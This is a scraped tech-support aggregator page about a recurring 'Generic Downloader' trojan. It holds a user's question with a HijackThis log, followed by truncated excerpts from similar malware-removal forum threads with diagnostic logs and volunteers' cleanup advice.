Tech Problem Aggregator

(Suggestions? & ) Help with “Generic Downloader.v” Trojan? (hijackthis log)

Q: (Suggestions? & ) Help with “Generic Downloader.v” Trojan? (hijackthis log)

Hi,
I NEVER open or launch ANYTHING I've received or downloaded without doing a McAfee virus scan on it first, and I'm very diligent about updating my virus/malware definitions, using automatic updates for McAfee VirusScan8 and MS Antispyware beta, and manually doing my updates for AdAwareSE, Spybot14, and SpywareBlaster virtually every time I open a browser, as well as running Stinger every couple days or so, but I have a major problem with a recurring Generic Downloader.v javainstaller applet Trojan that gets detected EVERY time I run AdAware, and have spent HOURS and HOURS trying to debug my system and hopefully _prevent_ its reoccurrence, with no luck so far. Am pretty frustrated.
Not only for the lack of success with that _known_ problem, but am pretty sure there is at least one or more _other_ things going on as well, judging by the random sluggishness, freeze-up, and glitches Im experiencing also. Have recently set up a limited browsing account for myself to hopefully forestall some of the problems with browsing, as well as disabling Java, but still, have noticed that invariably there seems to be one more process running than is shown in my taskbar when I return to the computer after a few minutes and its in sleep mode. This makes me think that there is _at least_ one other problem as well, since I cant identify anything in my registry settings and process viewers that seems to indicate what it would be.
Ive run all the above scans in safe mode numerous times and it has never stopped it yet; pretty frustrated that McAfee says that updated engine and DAT files will detect it and remove it how about BLOCKING the bleeping thing?!? Got so frustrated that I just downloaded a trial version of F-Secure Anti-Virus 2006 to run it (which necessitated going offline and the removal of both AdAware and McAfee to do so), and after running a full scan (that took 3&1/2 hours!), it *#$*^#! refused to let me view the report. GRRRRRRR!
So, of course, I just ran it again, so I could see what 2 viruses it said it detected the first time and to see which ONE (why only one??) of the 2 it renamed (per my setting changes to hopefully at least deactivate it if I couldnt remove it) and Guess What?!?!?! Couldnt view the report again this time either!! Said it detected only 1 virus this time, but it wasnt re-named. Clicked on the (active) ScanWizard Show Report button>>nothing. Click on the CommandCenter ViewReport button>>No new report. ??????? GRRRRRRR!!!! Not too impressed with F-Secure at this point. The WHOLE POINT was to see what they were, and how does it get me anywhere if theyre now re-named (one of them, anyways) but still dont know what/where they are?!? Maddening. Truly maddening after 7+ hours invested. F-Secure just sucks in my book at this point, as I now have to re-install both AdAware and McAfee again, to boot. Have downloaded a Sophos trial am willing to give a go with if anyone has a good word about it.
Also, I have a new DSL connection (FINALLY got wired for it way out here in the boonies! BellSouth, 1.5mbps, Westell/Wirespeed modem), and just recently uninstalled Firefox to see if that cured the problem NOPE. Using IE6 now, with all MS security updates, and though I have XPs(SP2) firewall turned on with cookies blocked, privacy settings on MedHi, and scripting notification on, am not sure if theres something else in the mix that Im missing, as Im now getting notifications from this mornings installation of F-Secure that there are possible browser hijack attempts when I go back online or sometimes open a new link (??that may have been happening all along, but just without notification of them previously??).
I also have one more anomaly that I cant explain; I have a (one and one only) TOTALLY blank Command Line entry in my msconfig Startup report that is attributed to HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. I dont know what this is or why it alone is not described as all the others are. Have deactivated other applications here that I know what they are and have had no problems (although would like to know how to remove some of them still present _entirely_ from the Startup Programs/menu) but definitely will not mess with this registry without knowing what Im doing first.
Have been advised by a friend to get my own router (a LinkSys, probably) to (his words) 100% prevent such problems, but first, would really like to get my system cleaned and have my settings changed/restored to eliminate/prevent as many of these problems from re-occurring in case I dont get the router.
Can anyone help with my hijackthis log below and/or have any suggestions otherwise? Much appreciated - Thanks!!

Logfile of HijackThis v1.99.1
Scan saved at 3:22:58 PM, on 12/17/2005
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Ahead\InCD\InCDsrv.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\F-SECU~1\backweb\4476822\Program\SERVIC~1.EXE
C:\Program Files\F-Secure Internet Security\Anti-Virus\fsgk32st.exe
C:\Program Files\F-Secure Internet Security\backweb\4476822\program\fsbwsys.exe
C:\Program Files\F-Secure Internet Security\Anti-Virus\FSGK32.EXE
C:\Program Files\F-Secure Internet Security\Common\FSMA32.EXE
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\Program Files\F-Secure Internet Security\Anti-Virus\fssm32.exe
C:\Program Files\F-Secure Internet Security\Common\FSMB32.EXE
C:\Program Files\F-Secure Internet Security\Common\FCH32.EXE
C:\WINDOWS\System32\svchost.exe
C:\Program Files\F-Secure Internet Security\Common\FAMEH32.EXE
C:\Program Files\F-Secure Internet Security\Anti-Virus\fsqh.exe
C:\Program Files\F-Secure Internet Security\Anti-Virus\fsrw.exe
C:\Program Files\F-Secure Internet Security\FWES\Program\fsdfwd.exe
C:\Program Files\F-Secure Internet Security\Anti-Virus\fsav32.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Microsoft AntiSpyware\gcasServ.exe
C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb07.exe
C:\WINDOWS\SYSTEM32\3cmlink.exe
C:\Program Files\F-Secure Internet Security\Common\FSM32.EXE
C:\Program Files\Microsoft AntiSpyware\gcasDtServ.exe
C:\WINDOWS\SYSTEM32\3cshtdwn.exe
C:\PROGRA~1\F-SECU~1\ANTI-S~1\fsaw.exe
C:\WINDOWS\SYSTEM32\3cmlink.exe
C:\Program Files\F-Secure Internet Security\FSGUI\fsguidll.exe
C:\Program Files\F-Secure Internet Security\FSGUI\ispnews.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\F-Secure Internet Security\backweb\4476822\Program\fspex.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Microsoft Office\Office10\WINWORD.EXE
C:\Program Files\F-Secure Internet Security\FSGUI\fsavgui.exe
C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe
C:\Program Files\Common Files\Microsoft Shared\Speech\sapisvr.exe
C:\Documents and Settings\Bradley\Desktop\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msnbc.com/
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msnbc.com/
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: Google Desktop Search Capture - {7c1ce531-09e9-4fc5-9803-1c2956615786} - C:\Program Files\Google\Google Desktop Search\GoogleDesktopIE.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O4 - HKLM\..\Run: [gcasServ] "C:\Program Files\Microsoft AntiSpyware\gcasServ.exe"
O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb07.exe
O4 - HKLM\..\Run: [Cmaudio] RunDll32 cmicnfg.cpl,CMICtrlWnd
O4 - HKLM\..\Run: [3c1807pd] C:\WINDOWS\SYSTEM32\3cmlink.exe RunServices \Device\3cpipe-3c1807pd
O4 - HKLM\..\Run: [F-Secure Manager] "C:\Program Files\F-Secure Internet Security\Common\FSM32.EXE" /splash
O4 - HKLM\..\Run: [F-Secure TNB] "C:\Program Files\F-Secure Internet Security\TNB\TNBUtil.exe" /CHECKALL /WAITFORSW
O4 - HKLM\..\Run: [F-Secure Startup Wizard] "C:\Program Files\F-Secure Internet Security\FSGUI\FSSW.EXE" /reboot
O4 - HKLM\..\Run: [News Service] "C:\Program Files\F-Secure Internet Security\FSGUI\ispnews.exe"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [APV] H:\Software\Process viewers\Autostart_ Process Viewer\autostart_and_process_viewer.exe
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: F-Secure 2006.lnk = C:\Program Files\F-Secure Internet Security\backweb\4476822\Program\fspex.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
O8 - Extra context menu item: &Block this popup - C:\Program Files\F-Secure Internet Security\Anti-Spyware\blockpopups.htm
O8 - Extra context menu item: &Google Search - res://c:\program files\google\GoogleToolbar2.dll/cmsearch.html
O8 - Extra context menu item: &Translate English Word - res://c:\program files\google\GoogleToolbar2.dll/cmwordtrans.html
O8 - Extra context menu item: Backward Links - res://c:\program files\google\GoogleToolbar2.dll/cmbacklinks.html
O8 - Extra context menu item: Cached Snapshot of Page - res://c:\program files\google\GoogleToolbar2.dll/cmcache.html
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Similar Pages - res://c:\program files\google\GoogleToolbar2.dll/cmsimilar.html
O8 - Extra context menu item: Translate Page into English - res://c:\program files\google\GoogleToolbar2.dll/cmtrans.html
O9 - Extra button: IE Shield - {300DB664-75B5-47c0-8B45-A44ACCF73C00} - C:\Program Files\F-Secure Internet Security\Anti-Spyware\ieshield.dll
O9 - Extra 'Tools' menuitem: IE Shield... - {300DB664-75B5-47c0-8B45-A44ACCF73C00} - C:\Program Files\F-Secure Internet Security\Anti-Spyware\ieshield.dll
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage) - http://go.microsoft.com/fwlink/?linkid=36467&clcid=0x409
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1134567180836
O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (ZoneIntro Class) - http://zone.msn.com/binFramework/v10/ZIntro.cab34246.cab
O16 - DPF: {E5D419D6-A846-4514-9FAD-97E826C84822} (HeartbeatCtl Class) - http://fdl.msn.com/zone/datafiles/heartbeat.cab
O23 - Service: F-Secure 2006 (BackWeb Plug-in - 4476822) - F-Secure Internet Security 2005 - C:\PROGRA~1\F-SECU~1\backweb\4476822\Program\SERVIC~1.EXE
O23 - Service: FSGKHS (F-Secure Gatekeeper Handler Starter) - F-Secure Corporation - C:\Program Files\F-Secure Internet Security\Anti-Virus\fsgk32st.exe
O23 - Service: fsbwsys - F-Secure Corp. - C:\Program Files\F-Secure Internet Security\backweb\4476822\program\fsbwsys.exe
O23 - Service: F-Secure Anti-Virus Firewall Daemon (FSDFWD) - F-Secure Corporation - C:\Program Files\F-Secure Internet Security\FWES\Program\fsdfwd.exe
O23 - Service: F-Secure Management Agent (FSMA) - F-Secure Corporation - C:\Program Files\F-Secure Internet Security\Common\FSMA32.EXE
O23 - Service: InCD Helper (InCDsrv) - Nero AG - C:\Program Files\Ahead\InCD\InCDsrv.exe
O23 - Service: InCD Helper (read only) (InCDsrvR) - Nero AG - C:\Program Files\Ahead\InCD\InCDsrv.exe
O23 - Service: Pml Driver HPH11 - HP - C:\WINDOWS\system32\HPHipm11.exe

A: (Suggestions? & ) Help with “Generic Downloader.v” Trojan? (hijackthis log)

7 more replies
Answer Match 78.96%

Here is my HiJack This log..I need help!Logfile of Trend Micro HijackThis v2.0.2Scan saved at 10:36:54 AM, on 7/18/2008Platform: Windows XP SP3 (WinNT 5.01.2600)MSIE: Internet Explorer v6.00 SP3 (6.00.2900.5512)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\WINDOWS\system32\spoolsv.exeC:\WINDOWS\Explorer.EXEC:\WINDOWS\system32\acs.exeC:\PROGRA~1\AVG\AVG8\avgwdsvc.exeC:\WINDOWS\system32\cisvc.exeC:\WINDOWS\system32\E_S00RP1.EXEC:\Program Files\Common Files\LightScribe\LSSrvc.exeC:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXEC:\WINDOWS\system32\HPZipm12.exec:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxWatch9.exeC:\WINDOWS\RTHDCPL.EXEC:\WINDOWS\system32\hkcmd.exeC:\WINDOWS\system32\igfxpers.exeC:\Program Files\HP\HP Software Update\HPWuSchd2.exeC:\WINDOWS\system32\igfxsrvc.exeC:\Program Files\Browser MOUSE\mouse32a.exeC:\PROGRA~1\AVG\AVG8\avgtray.exeC:\Program Files\Java\jre1.6.0_06\... Read more

A:Trojan Downloader.purity.y Trojan, Downloader Generic 7.zkr And Someother Variations

Hello Anne Arp and welcome to BleepingComputer,1. * Clean your Cache and Cookies in IE:Close all instances of Outlook Express and Internet Explorer Go to Control Panel > Internet Options > General tabUnder Browsing History, click Delete. Click Delete Files, Delete cookies and Delete historyClick Close below.* Clean your Cache and Cookies in Firefox (In case you also have Firefox installed):Go to Tools > Options.Click Privacy in the menu..Click the Clear now button below.. A new window will popup what to clear.Select all and click the Clear button again.Click OK to close the Options window* Clean other Temporary files + Recycle bin Go to start > run and type: cleanmgr and click ok. Let it scan your system for files to remove. Make sure Temporary Files, Temporary Internet Files, and Recycle Bin are the only things checked.Press OK to remove them.2. Please download Malwarebytes' Anti-Malware from Here or HereDoubleclick mbam-setup.exe to install the application.Make sure a checkmark is placed next to Update Malwarebytes' Anti-Malware and Launch Malwarebytes' Anti-Malware, then click Finish.If an update is found, it will download and install the latest version.Once the program has loaded, select "Perform Quick Scan", then click Scan.The scan may take some time to finish,so please be patient.When the scan is complete, click OK, then Show Results to view the results.Make sure that everything is checked, and click Remove Selected.When disinfection is complete... Read more

2 more replies
Answer Match 77.28%

DDS (Ver_09-01-18.01) - NTFSx86
Run by Owner at 8:21:49.90 on Wed 01/21/2009
Internet Explorer: 6.0.2900.2180
Microsoft Windows XP Home Edition 5.1.2600.2.1252.1.1033.18.447.141 [GMT -6:00]
============== Running Processes ===============

C:\WINDOWS\system32\svchost -k DcomLaunch
svchost.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
svchost.exe
svchost.exe
C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe
C:\WINDOWS\system32\LEXBCES.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\LEXPPS.EXE
C:\Program Files\a-squared Free\a2service.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\WINDOWS\System32\gearsec.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\WINDOWS\System32\svchost.exe -k imgsvc
C:\Program Files\Java\jre6\bin\jusched.exe
C:\windows\system\hpsysdrv.exe
C:\Program Files\HP\hpcoretech\hpcmpmgr.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\WINDOWS\system32\VTTimer.exe
C:\WINDOWS\AGRSMMSG.exe
C:\WINDOWS\system32\ps2.exe
C:\Program Files\Lexmark 2200 Series\lxbvbmgr.exe
C:\WINDOWS\ALCXMNTR.EXE
C:\Program Files\FinePixViewer\QuickDCF.exe
C:\Program Files\Lexmark 2200 Series\lxbvbmon.exe
C:\Program Files ... Read more

A:Infected with Win/Heur, Downloader.generic Trojan and Backdoor Generic

Please close this post. Problem has been fixed.

2 more replies
Answer Match 74.34%

Mod Edit: Log split away from topic here http://www.bleepingcomputer.com/forums/t/144809/infected-by-something-wicked/Deckard system scanner report is below. I was not able to load Kapersky because my IE is too corrupted and I can't get enough space on my hard disk in time before whatever is on my computer partitions off the space. I have cleared about 1 Gig of new space on my computer but the computer still shows that it has less than 100 MB of space on it.Deckard's System Scanner v20071014.68Run by Paul Hanken on 2008-05-05 23:34:54Computer is in Normal Mode.---------------------------------------------------------------------------------- System Restore --------------------------------------------------------------Failed to create restore point; disk is full.Backed up registry hives.Performed disk cleanup.System Drive C: has 0.01 GiB (less than 15%) free.-- HijackThis (run as Paul Hanken.exe) ----------------------------------------Unable to find log (file not found); running clone.-- HijackThis Clone ------------------------------------------------------------Emulating logfile of Trend Micro HijackThis v2.0.2Scan saved at 2008-05-05 23:38:01Platform: Windows XP Service Pack 2 (5.01.2600)MSIE: Internet Explorer (7.00.6000.16640)Boot mode: NormalRunning processes:C:\WINDOWS\system32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\system32\BRSVC01A.... Read more

A:Trojan Vundo.EGG, Trojan Retapu.D, Generic.Zeno.E5F12F0C, Adware.Isearch.D, Trojan Downloader.Small.

Hello 425Fool,

Welcome to Bleeping Computer

Sorry about the delay. If you still need help, please post a new HijackThis log to make sure nothing has changed, and I'll be happy to look at it for you.

Thanks,
tea

4 more replies
Answer Match 72.66%

This is a business computer and it is very important that it runs properly, been having issues with it for a week now. I have tried running several anti-virus programs to no avail. Currently using Panda, but used some other free software like AVG etc.Hoping you can help me, here is the hijackthis logLogfile of Trend Micro HijackThis v2.0.2Scan saved at 5:12:36 PM, on 2/2/2009Platform: Windows XP SP2 (WinNT 5.01.2600)MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\system32\svchost.exeC:\Program Files\Panda Security\Panda Antivirus Pro 2009\TPSrv.exeC:\PROGRAM FILES\PANDA SECURITY\PANDA ANTIVIRUS PRO 2009\WebProxy.exeC:\WINDOWS\system32\spoolsv.exeC:\Program Files\Broadcom\ASFIPMon\AsfIpMon.exeC:\Program Files\Citrix\GoToMyPC\g2svc.exeC:\WINDOWS\system32\svchost.exeC:\Program Files\Citrix\GoToMyPC\g2comm.exeC:\Program Files\Panda Security\Panda Antivirus Pro 2009\PsCtrls.exeC:\Program Files\Panda Security\Panda Antivirus Pro 2009\PavFnSvr.exeC:\Program Files\Citrix\GoToMyPC\g2pre.exeC:\Program Files�... Read more

A:Business computer infected with Trojan/CI.A, Trojan Downloader.MDW, and Generic Trojan

Hi,This is a business computer and it is very important that it runs properlyNot sure if you're aware how severly infected this computer is.Since you are posting a log from a Company owned computer... There are a few things that need attention first before we proceed with this..* You must inform your Supervisor immediately.This because of:Most company machines are connected into a network at some time or other, and your infection may compromise the security of that network.If sensitive material is compromised by an infection, your company could be held liable.* Your Company must give permission for us to give you assistance.This because of:We are not here to replace your company's IT Department. If there's an IT Department, then they are responsible to deal with this.There may be sensitive material on your computer that your company would not want revealed in an open forum.Also, since this is a computer used at work - the first thing I always advise is to back up important files you don't want to lose, this since malware causes a system unstable and it may happen that it suddenly won't boot anymore, because of the damage already present.Your system is severly infected. Problem with these infections nowadays is, it causes a lot of damage. Even if we clean the malware off your system, I can't guarantee that your system will be clean afterwards, because these infections/bundles leave a lot of leftovers behind that most scanners won't even recognise and logs won't show.Also, I ca... Read more

2 more replies
Answer Match 72.24%

Hi! McAfee detected two trojans (generic.dx) a few days ago, which I chose to remove. The computer had been running slowly and freezing quickly after booting up. Later during another scan, McAfee detected a generic downloader which really alarmed me because it was in my program files for all my passcodes (?)

I have not seen any pop-ups so far in Firefox, no strange or unusual messages; just a really slow boot-up and a new trojan found every time McAfee runs scans. It doesn't seem to go away =(

If you could help me that would be great!!!! Here is the HJT log:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 9:32:38 PM, on 9/26/2008
Platform: Windows Vista SP1 (WinNT 6.00.1905)
MSIE: Internet Explorer v7.00 (7.00.6001.18000)
Boot mode: Normal

Running processes:
C:\PROGRA~1\McAfee.com\Agent\mcagent.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\DellTPad\Apoint.exe
C:\Windows\OEM02Mon.exe
C:\Windows\System32\WLTRAY.EXE
C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe
C:\Program Files\Creative\SBLive 24-Bit External\Volume Panel\VolPanlu.exe
C:\Windows\System32\rundll32.exe
C:\Program Files\Creative\Shared Files\Module Loader\DLLML.exe
C:\Program Files\AIM\AIM Pro\aimpro.exe
C:\Program Files\Sigmatel\C-Major Audio\WDM\sttray.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Windows\ehome\ehtray.exe
C:\Program Files\Dell Support Center\bin\sprtcmd.exe
C:\Program Fi... Read more

More replies
Answer Match 72.24%

About every week or two McAfee finds either generic.dx or generic downloader.dx. It's installed as a service. I have to run McAfee in safe mode to remove it. My fear is that something is installed on my PC that activates every week or two and re-installs this trojan. I've run a complete McAfee which doesn't find anything. I did the on-line Kapersky primary area scan. I've also run SpyBot and MalwareBytes and they haven't found anything. I also have Windows Defender installed. I run the Windows Xp firewall. I run Secunia PSI and MS Baseline Security so Im pretty up to date on my patches. My fear is that something is installed that hasn't been found that wakes up every week or two and tries to re-install this trojan. I've attached the hijack this log and info below. thanks for looking at this.info.txt logfile of random's system information tool 1.04 2008-12-01 06:58:34======Uninstall list======-->C:\Program Files\Altiris\Altiris Agent\AeXNSAgent.exe /uninstall-->C:\Program Files\Altiris\Altiris Agent\AeXNSAgent.exe /uninstall-->C:\WINDOWS\IsUninst.exe -fC:\WINDOWS\orun32.isu-->rundll32.exe setupapi.dll,InstallHinfSection DefaultUninstall 132 C:\WINDOWS\INF\PCHealth.inf32 Bit HP CIO Components Installer-->MsiExec.exe /I{F1E63043-54FC-429B-AB2C-31AF9FBA4BC7}3CIPCalc-->C:\WINDOWS\IsUninst.exe -f"C:\Program Files\3Com\3CIPCalc\Uninst.isu&... Read more

A:generic.dx and generic downloader.dx Trojan

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a description of your problem, along with any steps you may have performed so far.Upon completing the steps below a staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.comDDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the results, click no to the Optional_ScanFollow the instructions that pop up for posting the results.Close the program window, and delete the program from your desktop.Please note: You may have to disable ... Read more

6 more replies
Answer Match 71.4%

DDS (Ver_09-05-14.01) - NTFSx86 Run by gus at 0:50:16.98 on Thu 06/11/2009Internet Explorer: 7.0.5730.13 BrowserJavaVersion: 1.6.0_07Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.1015.571 [GMT -4:00]============== Running Processes ===============C:\WINDOWS\system32\svchost -k DcomLaunchC:\WINDOWS\system32\svchost -k rpcssC:\WINDOWS\System32\svchost.exe -k netsvcsC:\WINDOWS\system32\svchost.exe -k NetworkServiceC:\WINDOWS\system32\svchost.exe -k LocalServiceC:\WINDOWS\system32\spoolsv.exeC:\Program Files\Common Files\ArcSoft\Connection Service\Bin\ACService.exeC:\WINDOWS\Explorer.EXEC:\PROGRA~1\SYMANT~1\SYMANT~1\DefWatch.exeC:\Program Files\Common Files\InterVideo\RegMgr\iviRegMgr.exeC:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exeC:\PROGRA~1\MYWEBS~1\bar\3.bin\mwsoemon.exeC:\WINDOWS\system32\rundll32.exeC:\WINDOWS\system32\rundll32.exeC:\WINDOWS\system32\rundll32.exeC:\PROGRA~1\MYWEBS~1\bar\3.bin\m3SrchMn.exeC:\WINDOWS\system32\Rundll32.exeC:\WINDOWS\system32\Rundll32.exeC:\WINDOWS\system32\ctfmon.exeC:\PROGRA~1\SYMANT~1\SYMANT~1\Rtvscan.exeC:\Program Files\Norton SystemWorks\... Read more

A:Packed Generic 214 , Infostealer Banker C ,Trojan Horse, Downloader, and Backdoor Trojan

Hello! My name is Sam and I will be helping you. In order to see what's going on with your computer I will ask for you to post various logs from the tools that we will use to resolve your issue. Please also share with me any information about how your computer is reacting and behaving each step of the way as we work through this process.Please download Malwarebytes Anti-Malware and save it to your desktop.alternate download link 1alternate download link 2Make sure you are connected to the Internet.Double-click on Download_mbam-setup.exe to install the application.When the installation begins, follow the prompts and do not make any changes to default settings.When installation has finished, make sure you leave both of these checked:Update Malwarebytes' Anti-MalwareLaunch Malwarebytes' Anti-MalwareThen click Finish.MBAM will automatically start and you will be asked to update the program before performing a scan. If an update is found, the program will automatically update itself. Press the OK button to close that box and continue. If you encounter any problems while downloading the updates, manually download them from here and just double-click on mbam-rules.exe to install.On the Scanner tab:Make sure the "Perform Quick Scan" option is selected.Then click on the Scan button.If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button.The scan will begin and "Scan in progress" will show at the top. It may ta... Read more

2 more replies
Answer Match 70.14%

Norton never finds it, and AVG won't rid of it! Help! I REALLY need to get rid of it!

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\Program Files\Norton AntiVirus\navapsvc.exe
C:\Program Files\Norton AntiVirus\SAVScan.exe
C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe
C:\WINDOWS\system32\RunDll32.exe
C:\WINDOWS\essspk.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\CyberLink DVD Solution\PowerDVD\PDVDServ.exe
C:\Program Files\D-Link\AirPlus XtremeG\AirPlusCFG.exe
C:\Program Files\ANI\ANIWZCS2 Service\WZCSLDR2.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\MSN Messenger\MsnMsgr.Exe
C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Grisoft\AVG Ant... Read more

A:Trojan Generic Downloader HELP!

12 more replies
Answer Match 70.14%

As you can probably tell by my name, I am new at this and technically challenged. I run windows xp and use the free mcafee antivirus program. I recently received a mcafee popup indicating that I have the generic downloader.bt trojan. The first thing I did was do a system restore which was sucessful but did not get rid of the trojan. I went looking at some similar threads and couldn't really understand much of what was said. I tried to do another system restore and the computer said it could not do it. I chose another date, and it still couldn't do it. I tried downloading spybot search and destroy and it showed some things, but I didn't see this trojan and it also said that to use the program, I have to buy it. While I am not opposed to buying the program, I don't want to have to buy 5 programs in the hope that one will work.

Any help anyone can give would be greatly appreciated.
 

A:Generic Downloader.bt trojan

10 more replies
Answer Match 70.14%

I have this on my laptop and I really need help. Please help.
C:\windows\system32\xlibgfl254.dll is infected by the Generic Downloader.bt troajn
 

A:Please HELP!!! Generic Downloader.bt Trojan

16 more replies
Answer Match 70.14%

Hey guys, I recently turned on my computer and was greeted by McAfee's message about a trojan called Generic Downloader.z However, McAfee said it could not delete or quarantine the file. My computer is running alot slower and I have no idea what to do. I am home for the weekend for Thanksgiving before going back to college next week so I am hoping I can fix this as fast as possible. Thanks in advance for the help.

Here is my Hijackthis Log:
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 1:24:33 AM, on 11/23/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\brsvc01a.exe
C:\WINDOWS\System32\brss01a.exe
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\COMMON~1\AOL\ACS\acsd.exe
C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Common Files\McAfee\HackerWatch\HWAPI.exe
C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
C:\PROGRA~1\McAfee\MSC\mcpromgr.exe
c:\PROGRA~1\COMMON~1\mcafee\redirsvc\redirsvc.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
